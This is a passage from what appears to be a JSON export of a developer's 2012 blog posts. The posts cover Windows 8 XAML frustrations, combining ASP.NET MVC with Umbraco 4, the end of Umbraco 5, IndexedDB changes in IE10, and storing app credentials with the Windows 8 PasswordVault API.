very far :P).\nXAML is verbose Oh… my… god.\nI’ve spent my entire development career doing HTML, and quite a lot of that I spent doing HTML with Umbraco, which obviously meant that I was writing a lot of XSLT (this was about 4 - 5 years ago, when there was no alternative) and in comparison to XAML XSLT is a shinny pillar of conciseness.\nI can only assume that this is why there are two GUI tools for generating XAML, having to hard-craft complex XAML files would be time consuming beyond belief (although from my understanding most people do hand craft them as the GUI tools are pretty flaky). Here’s an example:\n<ObjectAnimationUsingKeyFrames Storyboard.TargetProperty="(UIElement.Visibility)" Storyboard.TargetName="someElement"> <DiscreteObjectKeyFrame KeyTime="0"> <DiscreteObjectKeyFrame.Value> <Visibility>Visible</Visibility> </DiscreteObjectKeyFrame.Value> </DiscreteObjectKeyFrame> </ObjectAnimationUsingKeyFrames> That’s a snippet from a visual state to change an element from hidden to visible. Now this is how to do it in XAML, which leads me to my next point.\nA dozen ways to skin a cat Visual states are really cool, they are quite powerful to do the various amounts of animations that we’re using in our application but to me they are really clumsy to write (seriously, you’re looking at dozens of lines of XAML to make even a simple state of hiding a few elements and showing a few elements). This is where something like Blend comes into play (when it’s not crashing), it’s quite easy to create a simple visual state.\nAlternatively I could use code to manually manipulate those properties, it’s much more concise to do so (1 line vs the above 7) but then you’re ending up with stuff in your code behind or you’re loosing the power of animations.\nAnd then there’s binding…\nBindings Oh… my… god.\nI don’t understand how XAML, in any of it’s four incarnations, doesn’t have a better solution for this. Back on our Visual States, say I’ve got a multi-stage form, each stage has a new Visual State to show the appropriate fields, well logically I’d want to use an enum to set the current step and be able to tie that back to the UI… Right?\nYeah you’d think so, but no. There’s no way in the box to do the mapping between an enum and a Visual State. You end up with a lovely whack of code behind that watches for property change events and calls visual state transitions. Woo…\nEvents I come from a world of the DOM where event wireup is pretty fucked. IE always did it one way, really old IE did it another and then there was the spec. The only nice thing was there was only one type of events. XAML though seems to have two independent eventing models, traditional .NET events and commands. Both seem to be first-class citizens, but commands seem to have been conceived outside of wedlock and thus treated like a bastard.\nSome elements seem to implement commands as well as events, others just implement events. It’s quite frustrating, the fact that bindings are a common way to wire up commands to actions (like button clicks). But events can’t be bound, so you end up having to rely on code-behind or custom solutions. Neither of these are a great resolution, I just don’t get why it’s not in the box.\nControls Now this just baffles ms, as I said at the top this is Windows 8 XAML so I’m sure it’s a bit different in the other flavours but controls available is just whacky.\nHere’s an example, there’s no built-in control that restricts an input to just containing numerical values. Maybe I’m use to the web but I think this makes sense:\n<input type="number" /> In a HTML5-enabled browser this does a few things:\nIt will only allow numerical values It switches keyboards on soft-keyboard devices But there’s nothing built in that will do this in Windows 8 XAML. Or how about a date picker? You know that’s kind of a common scenario in an application, to be able to select a date… And apparently that didn’t make it until .NET 4.0 anyway.\nValidation The fact that there’s no built in validation floored me. This is a problem that was solved in ASP.Net in what, version 1.0? You know the idea of a required field shouldn’t be that hard… MVC did a great job including data annotations and building up that client side to integrate with jQuery validation (or their own validation framework as it was back in the day).\nBut there’s nothing in XAML for validation, no required fields, no regex validation, no data annotations for building up validation rules for your view model. It’s all up to you to solve on your own.\nBindings I must say that bindings are pretty sweet, coming from HTML and JavaScript I can see why things like Knockout.js were written, the ability to componentise a UI and link data up is very nice. I also think value converters are a pretty neat, a good way to produce a global solution to consistent bindings.\nI have one major problem with bindings, debugging. It’s 2012 and the “debugging” experience for bindings is to look at the Visual Studio Output window. I shit you not! I’ve managed to pretty much avoid needing the Output window ever since VS2003 except when I was looking into compiler errors but instead I’ve been keeping my eye on it every time a binding doesn’t do what I expect it to do.\nHow on earth does this not have a debugging experience? I remember the demos from Silverlight 5 showing it off but it’s apparently not in VS 2012 from what I can see, it seems like a massive oversight.\nThis leads me to the next WTF I’ve found in Windows 8 XAML (I think it’s only the case in Windows 8 XAML), you can’t bind Nullable<T>. You would not believe how long that took me to find out but yep, if you have a nullable DateTime, int, float, etc don’t expect to be able to bind to it. I’ve had mixed success with Dependency Properties over INotifyPropertyChanged but the majority of my tests have shown it to fail.\nWrap up Although my “full time” XAML experience is still fairly limited I can’t help but keep looking at it in a completely bemused fashion. While my experience is localised to Windows 8 XAML, I’m constantly shocked at how half-baked it feels. Some people might argue that Windows 8 XAML is a v1 product and should be treated as much but seriously this is the forth incarnation of XAML, forth (WPF, Silverlight, Windows Phone 7 and now Windows 8)!\nBut don’t get me wrong, I’m having a heap of fun, this is all relatively new to me, but the fact that XAML is in the state that it’s in I can see why HTML is a first-class citizen in Windows 8, at least it’s a fully featured markup engine.\nPS: Yes I know many of my problems can be solved with existing open source projects. My point is that a lot of the problems I’ve come across are not edge cases, they are things I’d expect my UI layer to do out of the box.\n", "id": "2012-08-20-xaml-by-a-web-guy" }, { "title": "Revisiting using ASP.NET MVC in Umbraco 4", "url": "https://www.aaron-powell.com/posts/2012-07-11-using-mvc-in-umbraco-4-revisited/", "date": "Wed, 11 Jul 2012 00:00:00 +0000", "tags": [ "umbraco", "asp.net-mvc" ], "description": "An update on using ASP.NET MVC with Umbraco 4.", "content": "A month on I wanted to revisit my post on using MVC with Umbraco 4. I write the code and draft while driving back from the retreat so it wasn’t very deeply investigated.\nBasically it was done as a proof of concept.\nWell today I was chatting with someone who was wanting to take the PoC and try it in production and through chatting we learnt a few things about what I initially write about that are important to know if you’re wanting to try it as well.\nWatch your routes There was a problem with the site whenever you hit the root of the site, the / route, the controller action was being executed. Luckily this is an easy fix. The MVC route registration looked like this:\nroutes.MapRoute( "Default", "{controller}/{action}/{id}", new { controller = "Home", action = "Index", id = "" }, ); Now if you know you’re MVC you’ll know that that matches the / route as well in MVC since we’ve given a default controller and action (it’s also why /home matches the Index action on Home). So what’s interesting here is that MVC’s routing engine takes priority over the Umbraco one.\nTo fix it you need to add some kind of static prefix to the route, what’s probably the easiest is to hard code the controller name, like so:\nroutes.MapRoute( "Default", "home/{action}/{id}", new { controller = "Home", action = "Index", id = "" }, ); This tells MVC that anything /home will go to the Home controller, it can’t go anywhere else.\nUmbraco reserved paths The above point leads onto this point, as I said it turns out that the MVC routes took over the Umbraco ones, this means that you don’t have to add an ignore route for Umbraco.\nIn the last post I said you needed to add ~/home like this:\n<add key="umbracoReservedPaths" value="~/umbraco,~/install/,~/home" /> Well seems I was wrong about that, sorry!\nConclusionWhat I’ve blogged is still very much a proof of concept but it seems that some people are thinking that it is actually a valid concept. This is a few lessons learnt from a project actually trying it out, I hope the guys blog about it once they are done but we’ll see.\nIf you learn any more yourself let me know!\n", "id": "2012-07-11-using-mvc-in-umbraco-4-revisited" }, { "title": "Stop using Hungarian jQuery!", "url": "https://www.aaron-powell.com/posts/2012-06-27-hungarian-jquery/", "date": "Wed, 27 Jun 2012 00:00:00 +0000", "tags": [ "jquery", "rant", "javascript" ], "description": "The code smell that's creeping into JavaScript development", "content": "I’ve been in software development for long enough that I remember a time when Hungarian Notation was all the rage to write strFirstName, iAge and objPerson, I also remember it dying and dying for a good reason.\nThe rise of Hungarian jQueryThis is something that I’ve been noticing more and more in JavaScript code that I work with, code that looks like this:\nvar $foo = $('.foo'); //do something with $foo Do you see what I’m referring to, the prefixing of $ onto a jQuery variable with the purpose of indicating that it’s a jQuery object. To me this looks just like using Hungarian Notation, that just like we use to prefix str to denote a variable as a string we are prefixing $ to denote a jQuery object.\nAnalysing Hungarian jQuery I’ve been calling this pattern Hungarian jQuery since when it’s being used people aren’t really following Hungarian notation, they don’t add the prefix elsewhere, it’s just specific to jQuery in their code.\nThe primary argument I’ve seen behind this is the same that Hungarian Notation took off to start with, editors for a long time were pretty shitty so it was hard to know what a variable type was, you’d constantly be scrolling up and down to work that out. A lot of the JavaScript editors we use (Visual Studio, Sublime Text 2, etc) don’t have as good JavaScript support as they do other languages. Generally this comes from the dynamic nature of JavaScript and that it can be quite hard to work out what the type really is so the use of the $ prefix helps us identify it as a jQuery object.\nBut it begs the question, if we use $ to help identify a jQuery object then why aren’t we using other prefixes to identify other variable types? What makes the jQuery objects in your code more important that the other objects which you have? And more to the point since JavaScript variables are dynamic you can change their type so what happens if you reassign the $foo to something that’s not of jQuery origins? I wouldn’t recommend that as you’re probably going to make a royal mess of your application but the fact remains that you can do it and there are valid scenarios for it.\nThere are other arguments behind the use of Hungarian jQuery, one of those is scoping, say we’ve got this code block:\n$('foo').on('click', 'a', function () { var $this = $(this); $.get('/bar', function (result) { $this.html(result); }); }); So the reason behind this is we have a click handler and inside that click handler we want to perform an AJAX request and then populate the HTML of the clicked element with something from the server (crappy example but you get the gist). Because of the way JavaScript scoping works by the time the AJAX response handler is called the this context is no longer the clicked element so we can’t work with it, instead we need to capture it in the closure scope but because this is a reserved word we can’t reassign it, instead we create a jQuery version of it and since we are making a jQuery version we append the $ to the start. Personally I’d write the code this way:\n$('foo').on('click', 'a', function () { var target = $(this); $.get('/bar', function (result) { target.html(result); }); }); It’s no longer using Hungarian Notation but still conveying the same point.\nConclusionI really dislike Hungarian notation, I was glad when the war was won and we no longer had to prefix our variables with silly things (don’t even get me started on m_) but quite often I see it creeping back into the JavaScript developers coding style. So next time you think “I’ll prefix with $ so I know it’s jQuery” ask yourself why you didn’t also prefix that bool with b so you knew it was a bool and that number with i so you knew it’s a number.\n", "id": "2012-06-27-hungarian-jquery" }, { "title": "I helped kill Umbraco 5", "url": "https://www.aaron-powell.com/posts/2012-06-25-i-helped-kill-umbraco-5/", "date": "Mon, 25 Jun 2012 00:00:00 +0000", "tags": [ "umbraco", "umbraco-5", "opinionated" ], "description": "Hi, my name's Aaron Powell and I was involved in killing Umbraco 5.", "content": "Hi, my name’s Aaron Powell and I was involved in killing Umbraco 5.\nBackground If you’re new to this blog you may not have heard of my before so here’s a bit of background. I’ve been involved with Umbraco for about 4 years now. I originally joined the project to create LINQ to Umbraco, a somewhat ill-fated experiment into Code First development. I’ve presented at every CodeGarden since my first one in 2009 on a range of topics from LINQ to Umbraco to unit testing Umbraco and this year on Signalr and RavenDB.\nI was also involved in some of the initial design and development of Umbraco 5 and worked with Shannon (mostly) as a sounding board when he needed to bounce ideas off someone while working on Umbraco 5.\nBut late last year I announced that I was leaving the project and it was bred out of frustrations towards the direction Umbraco 5 was going and the role that someone like myself, an outsider to the HQ, could maintain on the project. Ultimately I didn’t believe I could contribute in the way I saw as useful to so it was decided that I would leave the project.\nEven after leaving the project I still stayed in contact with many of the people on it, I had a lot of respect for Niels, Shannon, Matt, etc and they are all people I consider friends who I’d often chat with on Skype or various other mediums. I then decided to build a commercial extension for Umbraco 5 as a way to provide feedback on the way the project was shaping up (and to make some money on the side :P).\nReturning to Umbraco A few months ago Niels contacted me with a proposition, I come to CodeGarden 12 and the retreat before hand to help work through the issues that the HQ was having with Umbraco 5 and the issues I had which caused me to leave in the first place. I was quite taken aback by this, I’d done a bit of venting on twitter while building my commercial package and I hadn’t thought that I’d consider going back to CodeGarden. But after a few discussions I believed that I could do something useful for the tens of thousands of Umbraco users out there by bringing my voice to the table.\nBut it was clear that just because I was coming to “kick up a storm” didn’t mean that I would return to the project in the manner I previously had been involved.\nThe retreat First off I’m happy to say at this retreat no one saw my naked ass and I think everyone who attended was grateful for that.\nSecondly this year we had a good mixed bag of people at the retreat, there was everyone from HQ employees to contributors to package developers to site builders and people just passionate about open source and we all were involved in various discussions.\nWhat is Umbraco? One of the discussions I was involved in was (from my point of view) really important in helping define where Umbraco would go in the future, we had a discussion about what is Umbraco? While you might think that this is an easy question to answer “It’s a CMS” but that’s really only a small part of the picture. Here’s some of the learnings which came out of this discussion:\nUmbraco is a piece of software Yes this is a logical conclusion, Umbraco is a project that is released as Open Source that allows you to run a CMS. But most importantly is it’s a simple piece of software. Unlike many other CMS’s available you don’t have mark-up generated for you, someone said Umbraco respects the web in this manner, it gives you freedom to do that crazy design that your designer has come up with. Also through it’s simplicity it becomes really powerful, you can build anything from a 5 page brochureware site to a thousand view per second site because there’s so many extensibility points available for different kinds of developers while still regaining some level of control Umbraco is community This may sound a bit wanky at first, a bit like marketing fluff but having been involved with Umbraco for so long I am still always amazed at just how passionate the people who use it are, and just how willing Umbraco users are to help other Umbraco users. Doug Robar made a point about this, that when it’s late at night for him and he’s stuck with a project there’s always someone around that he can ping for advice even if they are on the other side of the world; no matter what time of day it is there always seems to be someone around willing to help out Umbraco is the packages Niels touched on this in the keynote this year but when people thing Umbraco they also thing things like uComponents and DAMP, these kinds of things are almost invaluable to the Umbraco developer and without them we’d waste a lot of time doing the boring stuff over and over again So really Umbraco is a sum of its parts, without these three aspects it wouldn’t be the same, we wouldn’t get behind it in the way that can have 380 people attend a conference. Then when we turned this learnings at Umbraco 5 we could see we didn’t have the same things there which is why it never really felt like Umbraco.\nWhat’s awesome about v5 Another discussion I was involved in (yes I’m aware that I keep saying things like “Discussions I was involved with” as though I was a critical factor in them, that’s not the case, we had plenty of other discussions going on which were equally as important I just wasn’t in them so can’t talk about them :P) was looking at what made v5 such a good project (this was also an open space topic from CG12 coincidently!) and the more we looked at it the more we started to see that the things that made v5 compelling were really just approaching v4 concepts with 8 years of learning, things like:\nProperty editors can save multiple values natively Trees/ applications/ macros and templates reside on disk Simple back-office sections There’s a defined structure to where packages reside Really what we were seeing is that most people didn’t care that the underlying systems could be swapped from nHibernate to something else, or that there was this really cool new unit-of-work concept, people spend their time configuring and extending the back office and the 1% of times that they really need to scale across multiple virtual servers on the cloud Umbraco may not even be the best fit for the project.\nThe community needed a better voice While the community has had Our for a few years now it has always been focused on the user community, how do I solve problems with Umbraco but it was never very good when it came to solving the problems in Umbraco. This topic was more born out of discussions with various people and not a structured discussion but ultimately contributors, HQ and implementers alike wanted a way to discuss the direction of Umbraco itself, people have businesses built around it so when changes happen that they don’t understand (the what or the why) it can be a nervous time.\nSome of this is what happened throughout the v5 development process, decisions were made that the community felt they didn’t have a say in, that they assumed was for the best but they didn’t really know; ultimately they felt out of control. To this end we decided to set up the Umbraco-dev mailing list so that the community has somewhere they can raise concerns directly to the people developing the product.\nThe downfall of v5 Hopefully you’ve started to see the picture I’ve been painting. There were many other discussions but I think these three really highlight how the decision was reached. Umbraco is a cool piece of software but without the community involved in it to them it was an unknown. There was lots of cool things in v5 but generally speaking they were evolutions on what people use day-to-day and as cool as other parts of v5 might have been it didn’t really bothered most people as it didn’t impact their average Umbraco project.\nSo we started to think about how to rectify this and we discussed this more than anything. We looked at could we remove parts of v5 to make it simpler, to make it more enticing to your average Umbraco user. We looked at how to get more people involved in the processes, take the project back from being a HQ-owned initiative and get more community members involved. Many angles were looked at what would be needed to ensure v5’s success, and believe me I very much pushed for this having a vested commercial interest in this. But the more we looked the more we began realise that forcing v5 to go on wouldn’t be in the best interest of everyone no matter how hard we tried.\nIn the end there was only a single decision that sat just right, Umbraco 5 would be discontinued.\nAlong came CodeGarden I can tell you that the lead up to the keynote this year was the most surreal experience I’ve had in a long time. We knew what was going to be announced but we had no idea how it would be taken by the community. CG12 had been touted as a v5 conference so on a scale of 1 to murderous just what was the crowed going to be like after the announcement? I applaud Niels for how he handled it, I can’t imagine it’s easy being up in front of that many people and delivering the news that Umbraco 5 was to be discontinued (if you haven’t yet I recommend watching the keynote) and I was standing with some of the HQ and retreat guys just waiting for the angry mob.\nBut it never came.\nWhile I’m not saying that it was all sunshine and rainbows, there are people who are really annoyed at the decision, there are people who wont ever use Umbraco again, but having been at CodeGarden, in the room with the other 380 attendees I can tell you that without a doubt by the end of day one the mood was positive, the weird tension during registration and before the keynote was gone and people honestly seemed happy with the decision, there was a sense of relief in the room.\nConclusion As I said at the start my name is Aaron Powell and I was involved with killing Umbraco 5. I know that there are people mad out there about the decision but I also know that for every angry person there’s a dozen happy people and that was why I came back this year to be involved with a project that makes people happy. I don’t deny that the next few months will be rough while the v4 project “restarts” but I’m excited to be apart of it again.\nI hope that this story has given you another insight on just how the decision came to be because the more open everyone is about this the better people can understand the reasoning behind it.\n", "id": "2012-06-25-i-helped-kill-umbraco-5" }, { "title": "Introducing the Umbraco contributor mailing list", "url": "https://www.aaron-powell.com/posts/2012-06-13-introducing-umbraco-contributor-list/", "date": "Wed, 13 Jun 2012 00:00:00 +0000", "tags": [ "umbraco" ], "description": "Keen discuss contributing to Umbraco's core, join the discussion now!", "content": "TL;DRWant to be involved in driving the Umbraco Open Source project, join the Google Group.\nAll the detailsOne of the things that has come out of the Umbraco retreat this year is that as a community we need to get more involved in the direction of the open source project. This has always been something that many people has wanted to do but the problem has been how do you get involved.\nFor many years there has been the Umbraco Core but no one was really sure about what it was and who really was involved. This lead to a limitation with getting the community excited and involved in working on the product of Umbraco itself as we often took the attitude of the core has it under control.\nWell it’s time to change that, and in doing so I’m announcing the start of the Umbraco developer mailing list, which is running on Google Groups.\nWith this we need to get a few things clear though:\nThis is a mailing list for discussing the open source project and not the usage of Umbraco; if you have a question about the usage of Umbraco then please use the excellent community site, our.umbraco.org. The moderators will close threads that are of this nature and redirect you to the appropriate forum Anyone can join. Got a question about the direction of the project this is the place to ask, got a feature to propose this is the place to discuss it, want to know how to get involved in submitting patches then ask it here Make sure you search before you ask, maybe someone else had that idea so check out their discussion This is the friendly CMS so remember to be an adult and play nice, the moderators will tell you off if you’re being out of line What does this mean for the Core? So you may be wondering what is the Core now? Well the goals of the Core haven’t changed, they were always about driving the Umbraco project but now we’re trying to make it easier for anyone to consider themselves part of the process. Ultimately the Core is the ones who have final say, they’ll be committing the code, managing the mailing list, handling pull requests and that kind of stuff.\nContributing code If you’re wanting to contribute code but you’re not sure about how to go about it then here’s a few useful links:\nUsing TortoiseHG with Mercurial Using the Mercurial command line and another article Here’s a Tekpub video on using Mercurial on CodePlex My talk from CodeGarden 11 on collaboration in Umbraco ", "id": "2012-06-13-introducing-umbraco-contributor-list" }, { "title": "Using ASP.NET MVC in Umbraco 4", "url": "https://www.aaron-powell.com/posts/2012-06-12-using-mvc-in-umbraco-4/", "date": "Tue, 12 Jun 2012 00:00:00 +0000", "tags": [ "umbraco", "asp.net-mvc" ], "description": "How to combine ASP.Net MVC applications with an Umbraco project", "content": "By now you’ve probably heard the decision of Umbraco HQ to no longer investing resources in Umbraco MVC and instead the focus (from both HQ and the community) is on making Umbraco 4 a better product.\nOne thing that a lot of developers were waiting for with Umbraco was the ability to use MVC with Umbraco. Over the course of the retreat we looked at where this motivation came from any one of the things that we seemed to agree is that most Umbraco users aren’t concerned about whether the underlying technology is MVC or not, the just want to be able to write clean mark up which MVC, or more importantly Razor allows you to do.\nBut there still is a valid reason for wanting to use MVC when building applications in Umbraco, and by that I mean if you’re building say a booking platform you may prefer to write that part of your application in MVC. This application side of your website may not really need content management so the onus of Umbraco is very little. So how do you go about doing this, using MVC for your web application inside an Umbraco CMS?\nIt’s all ASP.NETIf you’ve been following the movements of ASP.NET of recent months you’ll have seen a lot of emphasis by the ASP.NET team on the idea of One ASP.NET, that WebForms, MVC, WebAPI and WebPages are all part of the same stack and all can play nicely together. Scott Hanselman has blogged in the past on creating hybrid ASP.NET applications which allow you to host MVC along side WebForms and that’s what I want to look at.\nSimply put…\nBefore we beginThis is not a solution for everybody, what I’m going to look at through the rest of this blog is very much a proof of concept, I haven’t deployed a site doing this, I’m writing this blog post in the back of a car while driving to Copenhagen. It’s designed as an idea to hopefully inspire more people to get involved. It will also require you to open up Visual Studio and do some coding, but I expect that if you’re planning on building an MVC application that’s a known fact.\nI’m also going to make the assumption that you are familiar with MVC, if you’re not please start by checking out the guides at www.asp.net/mvc\nFinally:\nGetting StartedFirst things first I’m going to create an empty ASP.NET site. I’m using Visual Studio 2012 which comes with a completely empty project template:\nIf you aren’t running Visual Studio 2012 don’t fear, you can always use one of the other web project types and delete the files, here’s what my solution explorer looks like now:\nNext up grab yourself a copy of Umbraco 4, I’ve used Umbraco 4.7.2 for this but as newer versions come out some of this may change. Once you’ve downloaded Umbraco 4.7.2 (you can use Web Platform Installer as well) copy all the files into the folder which your project resides in. Make sure you replace the web.config with the Umbraco provided one. Also you don’t need to add any of the Umbraco files or folders to Visual Studio if you don’t want.\nYou’re now ready to go with creating your Umbraco instance, feel free to setup your database, document types, etc.\nGetting MVC installedSo now that we’ve got our Umbraco instance running we want to get our MVC application integrated. The first thing I want to do is to add MVC to the project, for this I’m going to use NuGet as it’ll greatly reduce the effort in adding references, but you can do it manually if you require.\nGo ahead an install the Microsoft.AspNet.Mvc NuGet package:\nNote: I used the Package Management Console, but you could just as easily use the GUI tool. Assuming you have NuGet installed both options are available from Tools > Library Package Manager.\nNow that that is done go ahead and create these folders:\nApp_Start Controllers Views Setting up our routesGenerally speaking you will create your routes inside the Global.asax file. Umbraco has been pretty notorious about how it handles this file so I found it easier to not register my routes there, instead I’m going to register my routes using the PreApplicationStartMethod attribute and this is why we created the App_Start folder.\nStart off by creating an empty class in there:\nnamespace WebApplication2.App_Start { public class RouteSetup { } } Now add a new method that will be used by the PreApplicationStartMethod attribute:\nnamespace WebApplication2.App_Start { public class RouteSetup { public static void Setup() { } } } Note: This method must be both public and static.\nNext up, add the attribute:\nusing System.Web;\t[assembly: PreApplicationStartMethod(typeof(WebApplication2.App_Start.RouteSetup), "Setup")] namespace WebApplication2.App_Start { public class RouteSetup { public static void Setup() { } } } What we’ve done here is told ASP.NET that we have a class which has a method we want to run when the application is starting up, and with this we can start injecting some routes:\nusing System.Web; using System.Web.Mvc; using System.Web.Routing; [assembly: PreApplicationStartMethod(typeof(WebApplication2.App_Start.RouteSetup), "Setup")] namespace WebApplication2.App_Start { public class RouteSetup { public static void Setup() { RouteTable.Routes.MapRoute( "Default", // Route name "{controller}/{action}/{id}", // URL with parameters new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults ); } } } I’ve added a couple of using statements and I’ve also added a single route, here you can define as many routes as you want, go as crazy as you need for your application routing. But there’s still one more thing we need to do with the routing, we need to make sure Umbraco will also ignore it. The Umbraco routing engine is pretty greedy, it wants to handle everything, the problem is that this isn’t an Umbraco route so we don’t want it to be handled there. Luckily this is easy to do, open up the Web.config and we’ll change the umbracoReservedPaths appSetting:\n<add key="umbracoReservedPaths" value="~/umbraco,~/install/,~/home" /> Note: The more complex your routes the more you’ll need to update this. It might be advisable to put all your routes behind a certain prefix. I’ve also not tested this with MVC Areas so I have no idea if that’ll work. Finally I have an idea on how to make the route registration simpler and more unobtrusive and I’ll post a follow up blog post.\nCreating a controller and viewsSo I’m going to go ahead and create a really basic controller:\nusing System.Web.Mvc; namespace WebApplication1.Controllers { public class HomeController : Controller { public ActionResult Index() { return View(); } } } This is just a standard MVC controller, go as nuts with it as needed. Now we’ll add the view:\n@{ Layout = null; ViewBag.Title = "Home"; } <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>@ViewBag.Title</title> </head> <body> <h1>Hello I'm a razor view.</h1> </body> </html> Note: This view is stupidly simple, but this is just a proof of concept :P.\nNote #2: You may not get the nice Visual Studio menu options for creating contollers and views, you also might find that the razor file has a lot of red squigglies, when this happens it’s because your Visual Studio project type is not an MVC project, there’s a GUID you can change in the csproj file but I’ll leave that to you to experiment with.\nWe’re just about ready to host our MVC application!\nWeb.config for allIn this demo, because I used NuGet I’m using MVC 4.0 which also means you have Razor 2.0, this means we need to do some changes to the Umbraco web.config file to support this.\nChange #1\nYou need to add your own Web.config for the MVC views, this will reside at /Views/Web.config in your project. The easiest way to get the contents is to grab it from a new MVC project. If you do that you need to remove a part though, as Umbraco already has some Razor support it will want to take over for the MVC side as well. Because of this you need to remove this part:\n<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> </sectionGroup> This section is actually defined in the Umbraco Web.config for Razor support so declaring it a second time will result in an error.\nChange #2\nAs I said I’m using MVC 4.0 here which also uses Razor 2.0 and because of this we need to convert Umbraco up to Razor 2.0. So you’ll need to identify the above mentioned config section in the Umbraco web.config and change the Version=1.0.0.0 to Version=2.0.0.0.\nDone!Yep with that all completed you’re done, you can now route to your MVC application side-by-side with your Umbraco CMS pages.\nConclusionSo over the course of this blog post we’ve looked at how you can get a MVC application working along with an Umbraco CMS in the same IIS/ website. There’s a few things to remember:\nWe’re using MVC for the application side of our website only\nUmbraco is still handling all the content pages and you have to use traditional Umbraco practices (you know, like Razor!)\nYou don’t have Umbraco content on the MVC pages but you have the Umbraco API so you could always do calls to get editor data\nThis was a proof-of-concept, implement it at your own risk\n", "id": "2012-06-12-using-mvc-in-umbraco-4" }, { "title": "IndexedDB changed in IE10 PP6", "url": "https://www.aaron-powell.com/posts/2012-06-04-indexeddb-changed-ie10pp6/", "date": "Mon, 04 Jun 2012 00:00:00 +0000", "tags": [ "indexeddb", "javascript", "ie" ], "description": "A subtle change to IndexedDB in IE10 PP6", "content": "When building Pinboard for Windows 8 I decided to use IndexedDB as the internal storage for the application since I was writing it using WinJS.\nInitially I wrote the application against the Consumer Preview release but when it came time to get it going for the Release Preview I hit a snag, the database layer was completely falling over! I kept getting an InvalidAccessError every time I tried to open a transaction. My code was looking like this:\nvar transaction = db.transaction('my-store', IDBTransaction.READ_WRITE); I couldn’t work out what was going wrong here, I hadn’t changed my code and reading the spec at the time everything looked exactly right…\nWatch out for fluid specs!\nWhat I hadn’t noticed was that there was a new version of the IndexedDB spec in the works and in this spec the IDBTransaction enum had been dropped in favour of string representations of the transaction types and IE10 was implementing this spec.\nSo I had to update all my code to remove the enum values in favour of string values:\nvar readOnlyTransaction = db.transaction('my-store', 'readonly'); var readWriteTransaction = db.transaction('my-store', 'readwrite'); This spec is now the current version and most of the browsers have moved to using it (although Chrome still insists on having the enum available it just raises a warning if you use it) so you’re code should work once updated.\nTL;DRYou should use my library, db.js, to simplify your interaction with IndexedDB across the different browsers.\n", "id": "2012-06-04-indexeddb-changed-ie10pp6" }, { "title": "Storing credentials in Windows 8", "url": "https://www.aaron-powell.com/posts/2012-06-04-storing-credentials-windows-8/", "date": "Mon, 04 Jun 2012 00:00:00 +0000", "tags": [ "windows8" ], "description": "", "content": "So you’re building a Windows 8 application and you want to authenticate against an external service. For this it’s likely that you’re going to want to store a username and password for the user so that you can query off to the external service without bugging them constantly.\nThis was something that I had to do for my Pinboard for Windows 8 application so I wanted to make sure that I was doing it above board and no one would think I’ve been sneaky and abused their privacy.\nAccessing credentialsLuckily Windows 8 provides you a nice and easy way which you can store the credentials your application has. I’ll admit that I’ve not done a lot of desktop application development so this may not be that new but hey it’s new to me and new for WinJS :P. The way you interact with the credentials is through the Windows.Security.Credentials.PasswordVault class and it’s shockingly simple to do:\nvar resourceKey = 'My app key'; var passwordVault = new Windows.Security.Credentials.PasswordVault(); var credentials = passwordVault.findAllByResource(resourceKey); First off you need to create a resource key for your application; this is an identifier for your application’s credentials. The FindAllByResource method will provide you with all the credentials you’ve stored, you can then filter this down as required to find the particular user you’re after.\nOnce you have the username you can retrieve the password since the password wont be provided in a usable method initial (I’m guessing for security reasons) so you have to explicitly request it:\nvar user = passwordVault.retrieve(resoruceKey, credentials[0].userName); This user object will have a password property that you can do what ever you need to do.\nWhere it gets uglyIt’s the first time a user installs your application so you wont have any credentials. You want them to log in before you can do anything right? That makes sense so you check to see if there is a user:\nvar resourceKey = 'My app key'; var passwordVault = new Windows.Security.Credentials.PasswordVault(); var credentials = passwordVault.findAllByResource(resourceKey); if (credentials.length) { //we've got a credential } else { //no credentials yet } Right? Wrong.\nWhere you expect to an empty credential store for your resource you actually get… an exception! That right the code you’ll actually need looks more like this:\nvar resourceKey = 'My app key'; var passwordVault = new Windows.Security.Credentials.PasswordVault(); var credentials; try { credentials = passwordVault.findAllByResource(resourceKey); //we've got a credential } catch (e) { //no credentials yet } Le sigh… I haven’t found any better way to do this other than trying to get all credentials using the retrieveAll method but that implies that it gets back all credentials regardless of the resource key, which is what we really want to identify our application.\nStoring credentialsOnce we get passed the oddity of try/ catch driven development it’s worthwhile thinking about storing credentials. Turns out that this is also really easy to do:\nvar creds = new Windows.Security.Credentials.PasswordCredential(resourceKey, username, password); passwordVault.add(creds); Now your store is updated and what’s also cool is that you can access them from Windows 8 itself. If you navigate to Control Panel\\User Accounts and Family Safety\\Credential Manager you’ll see your newly stored credentials:\nAnd there we go, all stored securely inside the Windows security store. The other cool thing about this is that it allows credentials to roam between devices, I haven’t been able to put this to the test yet though as I only have one machine with Windows 8 on it so roaming isn’t all that viable!\nConclusionStoring credentials in Windows 8 is so simple but it has some strangeness about it. Your main point of call is the PasswordVault class, part of the Windows 8 runtime, which gives you a simple programming interface into the Windows security store.\n", "id": "2012-06-04-storing-credentials-windows-8" }, { "title": "Pinboard for Windows 8", "url": "https://www.aaron-powell.com/posts/2012-06-01-pinboard-for-win8/", "date": "Fri, 01 Jun 2012 00:00:00 +0000", "tags": [ "windows8" ], "description": "A Windows 8 application for the Pinboard bookmarking service", "content": "With the release of the Windows 8 store today I’m excited to say that you can now download my Pinboard for Windows 8 application!\nA few months ago Tatham pointed me to a bookmarking service called Pinboard which is described as antisocial bookmarking, and is aimed at being a super simple bookmarking service, it’s no fuss, no bells-and-whistles, it’s just a bookmarking service.\nWhen I first started using Windows 8 I really wanted to be able to interact with my bookmarks, particularly when I was using IE10 Metro. Since IE10 Metro is a plugin-free browsing experience I wouldn’t have a plugin like Chrome so how was I going to manage my bookmarks?\nSince Windows 8 aims to have seamless integration between different applications I wanted to leverage this, in particular I wanted to use the Sharing Target capabilities. Also I wanted to be able to quickly find different bookmarks again Windows 8 provides a good way to do search that can integrate with your 